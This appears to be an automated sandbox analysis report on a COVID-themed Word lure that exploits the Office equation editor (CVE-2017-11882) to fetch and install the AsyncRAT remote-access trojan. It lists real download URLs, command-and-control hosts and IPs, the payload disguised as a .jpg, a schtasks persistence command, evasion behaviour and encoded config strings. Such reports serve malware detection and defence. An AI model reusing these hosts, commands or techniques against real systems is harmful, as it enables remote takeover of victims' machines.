Analysis Report Deadly Variants of Covid 19.doc

Overview

General Information

Sample Name:	Deadly Variants of Covid 19.doc
Analysis ID:	356233
MD5:	3d9171d094dae1fb8da244756dd9733c
SHA1:	91e43ec7a21e7e8c1fc2a6202ca3545974084ad2
SHA256:	4d1bde540b3c45739e1d8cff08e801ccb6ff9caad391109dc298b011a914e57c
Tags:	COVID-19docWHO
Most interesting Screenshot:

Detection

AsyncRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM_3

Yara detected AsyncRAT

Connects to a URL shortener service

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	ReversingLabs: Detection: 10%
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Source: Deadly Variants of Covid 19.doc

ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.69577.exe.400000.0.unpack

Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00697580
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00691D74
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00697574
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_00691D80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: bit.ly

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 79.134.225.49:5000 -> 192.168.2.22:49169

Connects to a URL shortener service

Source: unknown

DNS query: name: bit.ly

Uses dynamic DNS services

Source: unknown

DNS query: name: greatestyear2021.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 79.134.225.49:5000

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 79.134.225.49 79.134.225.49
Source: Joe Sandbox View	IP Address: 93.89.224.134 93.89.224.134
Source: Joe Sandbox View	IP Address: 67.199.248.10 67.199.248.10

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr

Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 69577.exe, 00000007.00000003.2127625486.00000000047F2000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 69577.exe, 00000007.00000002.2351786512.000000000047C000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2352229975.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 69577.exe, 00000007.00000002.2354290555.0000000005BB0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: 2Me6ei3[1].htm.2.dr	String found in binary or memory: http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\69577.exe	Code function: 4_2_00465948	4_2_00465948
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046DD70	4_2_0046DD70
Source: C:\Users\Public\69577.exe	Code function: 4_2_004636CA	4_2_004636CA
Source: C:\Users\Public\69577.exe	Code function: 4_2_00465720	4_2_00465720
Source: C:\Users\Public\69577.exe	Code function: 4_2_00463FA9	4_2_00463FA9
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046488F	4_2_0046488F
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046408B	4_2_0046408B
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046492F	4_2_0046492F
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046412B	4_2_0046412B
Source: C:\Users\Public\69577.exe	Code function: 4_2_004649CF	4_2_004649CF
Source: C:\Users\Public\69577.exe	Code function: 4_2_004641CB	4_2_004641CB
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464A6A	4_2_00464A6A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464268	4_2_00464268
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464B0A	4_2_00464B0A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464308	4_2_00464308
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464BA4	4_2_00464BA4
Source: C:\Users\Public\69577.exe	Code function: 4_2_004643A8	4_2_004643A8
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464442	4_2_00464442
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464C41	4_2_00464C41
Source: C:\Users\Public\69577.exe	Code function: 4_2_004644E2	4_2_004644E2
Source: C:\Users\Public\69577.exe	Code function: 4_2_004674E8	4_2_004674E8
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046457F	4_2_0046457F
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464619	4_2_00464619
Source: C:\Users\Public\69577.exe	Code function: 4_2_00460EEA	4_2_00460EEA
Source: C:\Users\Public\69577.exe	Code function: 4_2_004646B9	4_2_004646B9
Source: C:\Users\Public\69577.exe	Code function: 4_2_00465710	4_2_00465710
Source: C:\Users\Public\69577.exe	Code function: 4_2_004647EF	4_2_004647EF
Source: C:\Users\Public\69577.exe	Code function: 4_2_00463FF1	4_2_00463FF1
Source: C:\Users\Public\69577.exe	Code function: 4_2_00696418	4_2_00696418
Source: C:\Users\Public\69577.exe	Code function: 4_2_006955D0	4_2_006955D0
Source: C:\Users\Public\69577.exe	Code function: 4_2_00695078	4_2_00695078
Source: C:\Users\Public\69577.exe	Code function: 7_2_00384DB8	7_2_00384DB8
Source: C:\Users\Public\69577.exe	Code function: 7_2_00385688	7_2_00385688
Source: C:\Users\Public\69577.exe	Code function: 7_2_003871F8	7_2_003871F8
Source: C:\Users\Public\69577.exe	Code function: 7_2_00384A70	7_2_00384A70

Source: 7.2.69577.exe.400000.0.unpack, Client/Settings.cs

Base64 encoded string: 'GKyOs4mqqffrORbI+/SRDpDoWIHE7D9sSHoEMvC02sIHmvCDNWQu4eQ2CSkUkryaSTqv1Lc7sX9a+95BfwlqKlGP3NE0911acn24pjupCiE=', 'Nyi0F1igo6v0KFrZP/hXZp+cU2YJnVu/jH17vtFNQvjANrhd2gEnvSMfQLWpCkMG2YDOvKHxP+/Ed1RXXjNjXg==', 'PJvf6bLPQIzvp8wi/eJWbZHAwDKMh+cb/S+IhaLtlwSfyWDkQU2XZyXl+lgfFG4zKsH7M+94v9G7neDSBUAszHbQprcp0xVzEqueEcaNfWo=', 'SzbRAzvKp9S6tfVPQfLVUFAiQFnjWbsmGAzWOjoEVvwxh7SQdPpHnJgMgW3n31m1Wi/hT6EIwlsXa7tTDyG7OG5TIESVBspdbC2Xo07c3oKXej8l/baWaLEwTfQJBdKNEQ8zpDfJP/Y80vcE7WXkivLhevxA0jUhiyeilRdeepKYb+LyWhoASZaxQ5U0KOB9hd9V4d+N9tzdsenqCbX2RFlLrpqjFk9UMCEPCvAqxm9UfwGImD7JBnHbo5b14gG5XwGAxawe+QFu2JPLStNIhbGNGrPAGaWV3eJrlCe458zkIzS9ZDQYgygVH1sxqdaWEtLF3Q7iLZNCERN+x8SQXFDyPAFtjfSvyCSU8ko2rAidaNHd6U0QhN1EVf9OsCkpi4zZ/QRMsnc1VdrAckbN9awauiSbVs5aGVMeSYbPSm7bdqfyU8GUkUGk0ksUpPXkl5CNagqniV8EuAQ2Aj/bj/0AlNABwURRx6DYo+MZmOcFi0kaKzE72HBF86b4hpQk2rbH6CqzLA+ADPojq4EuxnFvZ1UIzK55S5FEa6WIs7wu7R1U/YIiTgO+6rX8R1hTCh8UMNPl0hY2ib05HaWzOOfGAmMtBaDT/d0VQGifCWuJ1NWv25IkfVqEhMPasUO41gdIcvk2K2AdW/KyON3rwHCcb5bDoXgPMOtAw8gX+ecOLFddUKYUsGYSPXaY5BRV1ok/nqDdzkECgpRR960P+ohfMMnOf2BhYY84yUmniwHEckRhZnrYmPhUNSG9vdkVci827X1DTE6b0xupNLWji6jtz8g8xQL5WXuRNbvJMJqq+IlvwRpaQ62gwzDO7p+jFO9wbUSE+1X/QhOBojWGLvItpBNmO16U33gu10ZOYzAeD3Y6uLf4wJ5um+1Sd/xXD8YssVao0cyOcvzRnbsiPlDWUl3BhIF+E0xCOY6VtcXAVanZzff0TQgB6WEJCM+mmDOEeOpo40CbqktDHXRDgw==', 'ze7mDq6AUfAO4/XDqQ9KTDg/4gOhNcqJuhRKQPbWcWLDUwjqOkgZYOg88ry1jyxgCtiIJ2Oab8L0207OXaDh4Q==', 'w9QHBiF4GNH2OE1WWIq/iALIlOVzLN+eqm/CymJld2qvp0cHlkpQL4Im9GSZcrsfLCcV3GOanTpc07FT5fkDjA==', 'zZ0k0sT0L/YwqUO6mapP8hk2zsVknfrnj4e56GEKR0bJWQifogqCb6TzWELfE3WRd7vTZ1NLZ/TYPymQl7E0hg==', 'I6q2Evg/k/+LyIZ7xcwC8YgfnMNMpCKwrpsAsAEsWsTJkSQGH4VaK19V1ua8Wc5qxzd88ykyr3AqWIZemNNifg=='

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/18@3/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$adly Variants of Covid 19.doc

Jump to behavior

Source: C:\Users\Public\69577.exe

Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ................P.......................(.P.....P.......H...............Lq......................................................................

Jump to behavior

Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\69577.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\69577.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Deadly Variants of Covid 19.doc

ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\69577.exe

Code function: 4_2_004683E6 push es; iretd

4_2_004683E7

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Roaming\rLliXAh.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg

Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\69577.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
